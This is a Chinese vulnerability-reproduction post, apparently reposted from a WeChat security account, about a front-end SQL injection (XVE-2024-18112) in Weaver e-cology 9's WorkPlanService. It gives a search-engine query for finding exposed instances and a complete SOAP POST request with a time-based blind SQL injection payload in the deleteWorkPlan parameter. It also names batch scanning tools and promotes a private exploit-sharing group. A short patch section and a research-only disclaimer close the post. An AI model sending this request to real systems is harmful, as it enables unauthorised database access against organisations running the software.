0x01 产品简介
某微e-cology是一款由泛微网络科技开发的协同管理平台,支持人力资源、财务、行政等多功能管理和移动办公。
0x02 漏洞概述
该漏洞是由于某微e-cology未对用户的输入进行有效的过滤,直接将其拼接进了SQL查询语句中,导致系统出现 SQL 注入漏洞。
0x03 搜索引擎
app="泛微-OA(e-cology)"
0x04 漏洞复现
POST /services/WorkPlanService HTTP/1.1
HOST:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.6367.118 Safari/537.36
Content-Type: text/xml;charset=UTF-8
Connection: close
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:web="webservices.workplan.weaver.com.cn">
<soapenv:Header/>
<soapenv:Body>
<web:deleteWorkPlan>
<!--type: string-->
<web:in0>(SELECT 8544 FROM (SELECT(SLEEP(5-(IF(27=27,0,5)))))NZeo)</web:in0>
<!--type: int-->
<web:in1>22</web:in1>
</web:deleteWorkPlan>
</soapenv:Body>
</soapenv:Envelope>
0x05 工具批量
nuclei
afrog
xray
POC脚本获取
请使用VX扫一扫加入内部POC脚本分享圈子
0x06 修复建议
1、关闭互联网暴露面或接口设置访问权限
2、官方已发布升级补丁包,支持在线升级和离线补丁安装,可在参考链接https://www.weaver.com.cn/cs/securityDownload.html进行下载使用。
原文始发于微信公众号(nday POC):【漏洞复现】某微E-Cology9 WorkPlanService 前台SQL注入漏洞(XVE-2024-18112)
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论